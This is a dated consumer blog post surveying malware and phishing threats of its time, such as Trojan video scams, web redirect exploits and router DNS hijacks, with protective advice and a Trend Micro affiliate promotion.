Current Malware Threats In The Wild
All of the above mentioned malware types are threats to anybody running a Windows based operating system, especially when they are connected to the Internet. There are malware threats that are specifically targeted at other operating systems, like MacIntosh and Linux, but they are less prevalent, mostly due to the smaller installed base of those OS's. Some come to you over the wires, so to speak, via TCP/IP attacks against open "ports." A router between you and your external broadband modem can stop those attack vectors (unless you have poked holes in the router's firewall). However, no common router has the means of protecting you against malware threats that come in as you read email, or use your Internet browser. Unless you have an advanced router that receives regular updates to it's malware detections, you will need to keep a software firewall running on your computer, to protect it against hostile incoming TCP threats.
Malware threats do not just come from the Internet. I got into computer troubleshooting before I was connected to the Internet, due to an infected floppy disk. Floppies are mostly gone nowadays, but there are still some CD's, DVD's and plug-in memory devices that are somehow infected before going to, or during production. Then, you have certain music companies who knowingly install programs onto their CD's, which install rootkits onto the computers of legitimate buyers, to prevent copying those CD's (DRM protection). This was done a couple of years ago by Sony-BMG. Those DRM rootkits were then exploited by cyber-criminals to install other, much more dangerous types of malware.
Every week or two there seems to be a new type of malware attack method discovered, as well as constant variations of existing methods of infection. This article will review the latest methods of delivering viruses, spyware, rootkits, backdoors, keyloggers and Trojans to your PC. All of the threats listed are already "in the wild." Most of them are being used to draft unprotected, or insufficiently secured Windows PC's into Botnets. Others are used to steal login information to websites control panels, servers, banks, eBay, PayPal, or similar institutions. Then there are the pop-up ad windows that can render a computer unusable, and rogue anti-spyware programs that trick you into paying to remove the threats that the program itself invented, or installed. Your best defense against all of these threats is to keep a firewall running at all times, keep the most current version of anti-virus and anti-spyware programs working and updated, and keep fully current with Windows or MacIntosh security patches and updates (yes, Apple releases security patches too).
The most prevalent malware threats, in the Wild, include the following (The Dirty Dozen):
- Lunar eclipse video scam - link leads to Trojan and Botnetting if clicked
- IRS rebates and refunds phishing scams - targets US citizens by mail or phone
- Bank Of America phishing scam
- Hillary Clinton video download scam - link downloads a Trojan if clicked
- Britney Spears and Paris Hilton video scams - link downloads a Trojan if clicked
- Storm Trojan numeric links in spam emails continue, but are reduced.
- Thousaands of compromised web servers are still allowing JavaScript redirection exploits to occur, leading to stealth download infection attacks to many visitors of the web sites hosted on those servers.
- Compromised individual web sites have had hidden iframes installed, by criminal hackers, leading to instant infection of insufficiently secured PC's visiting those web sites.
- Adobe Reader had a vulnerability that, if exploited, allowed complete computer takeover. Everybody using Adobe Reader or Acrobat should be sure they update to the latest, patched version. Use the program's Help menu to check for updates and install them.
- Apple QuickTime exploits are in the wild. Make sure you update to the current version.
- There are Java virtual machine exploits on compromised web pages. Make sure you computer has the latest version of Sun's Java.
- Finally, rounding out the Dirty Dozen, certain brands of wired and wireless routers are being targeted with DNS redirect attacks. This involves sending code, from simply opening a hostile spam email message, to the targeted router, which reprograms the router to send users to a phishing banking website, or other financial institution, if you try to logon to that institution. Router exploits that are in the wild were recently successful against millions of Mexican DSL routers, many of whose owners used the bank that the redirect was aimed at. All of these router attacks depended on the users not setting a personal Administrator password! Those with a password were not affected.
What you can do to protect your PC and your identity
If you have a Mac OS PC, make sure you check for updates at least once a month, or turn on automatic checking for security updates. Mac's "Finder" has a link to check for Apple Updates. If you have iTunes installed, it may need updates occasionally as well.
If you have a Windows PC, the quickest method you can use to check the security level is to visit the security website, Secunia.com, and run their online Secunia Software Inspector (requires Java). After you read the instructions and click on Start, a second page will load, then click on Start on that page and it will scan your PC for vulnerable software in it's database, and missing Windows Updates. If the Software Inspector finds out dated versions of software it will highlight them with a red mark and expand their details to tell you what vulnerability exists. It will also provide a direct link to the applicable page where you can download the patched version. Sometimes, Secunia will locate an older version of Flash, or Java, that has been left behind after updating to the current version. It will show the locations of those still-vulnerable files, which you should manually delete, or uninstall (Control Panel > Add/Remove Programs).
To protect your router from code exploits, establish a unique Administrator password (do not use the word "password"), disable remote administration and turn off UPnP. If you have a wireless router, setup the best level of encryption your receiving computers can work with. Most broadband routers come with a firewall, with configurable rules and a means of "poking holes" in them. Make sure your router's firewall is turned on and do not allow any port holes unless they are necessary for your personal or business use (e.g: filesharing, VPN, remote desktop, ftp. etc). Routers use "NAT" to hide your personal network computers from the public Internet. This makes them a less visible target for TCP/IP exploits.
Finally, if your PC shipped with a free trial version of a security program and it has expired, and you have not paid to renew it, you had better either pay for it, pay to upgrade it, or uninstall it and get a different security program. An expired anti-virus or anti-spyware program is totally useless and it's only current affect is to eat up valuable system resources! There are many fine security programs available, both in retail stores and online. I have ads for several brands on this blog and on my other web pages, all of them reputable. However, I have my eye on one in particular that seems to be pulling ahead of the others, especially in the area of intercepting web site borne malware threats. That company is Trend Micro. They have a technology that is included in the Trend Micro Internet Security 2008, also known as "PC-cillin," that analyzes the content of web pages you visit, screening them for either known hostile codes, or potentially hostile embedded exploits, based on heuristics. If such codes are discovered Trend Micro's web threat protection will block the harmful content, while allowing safe content to be delivered. Or, it can block the entire web site from downloading anything, if you prefer. This type of defense is invaluable when you consider that much of today's malware is being delivered through website exploits and hidden redirects.
The Trend Micro Security Suite 2018 also comes with a two way firewall, anti-virus, anti-spyware and anti-phishing protection, with multiple daily automatic updates, all for a reasonable subscription price and allowing you to protect up to three PC's under one license. Get 10% Off a 1 year subscription to Trend Micro Internet Security 2008, using Coupon Code: TrendIS08.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.